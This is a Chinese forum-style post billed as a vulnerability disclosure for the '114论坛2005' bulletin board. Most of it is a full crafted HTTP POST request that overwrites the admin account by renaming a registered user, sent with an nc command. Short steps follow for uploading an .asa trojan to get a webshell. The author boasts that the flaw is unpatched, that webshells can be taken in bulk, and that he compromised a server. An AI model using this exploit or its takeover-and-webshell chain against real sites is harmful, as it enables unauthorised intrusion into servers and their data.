漏洞公布：114论坛2005正式版漏洞

修改第一个"33221"为“admin”保存11.txt文本为：

POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*

Referer: http://www.***.net.cn/xzl/BBS//edituserdb.asp

Accept-Language: zh-cn

Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)

Host: www.***.net.cn

Content-Length: 2304

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtUserCode"

admin

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtPassword"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtConfirmPassword"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtQuestion"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtAnswer"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtUserName"

33221

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="selSex"

先生

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtNick"

11

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtProvince"

111

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtAddress"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtPostCode"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtTel"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtMobile"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtFax"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtEmail"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtUrl"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtfile"; filename=""

Content-Type: application/octet-stream

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtOicq"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtDocument"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="submit"

修改注册信息

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtId"

-----------------------------7d61e41d605f6

Content-Disposition: form-data; name="txtTempId"

-----------------------------7d61e41d605f6--

这里因为我注册的用户名33221与admin长度一至，所以这里不用修改字节长度。

然后用nc提交到服务器

nc www.***.net.cn 80 <11.txt

返回提示修改会员资料成功。

然后用admin 密码为申请33221的密码一至登录。

当然就是管理员权限了，然后登录后台，点击“修改栏目”，上传asa木马，ok,拿到webshll。

看了一下，这个论坛系统还没有出补丁，可以拿大批webshell了，不过我只要了对我比较有用的一个服务器，其它的没有去抓了。

(e129)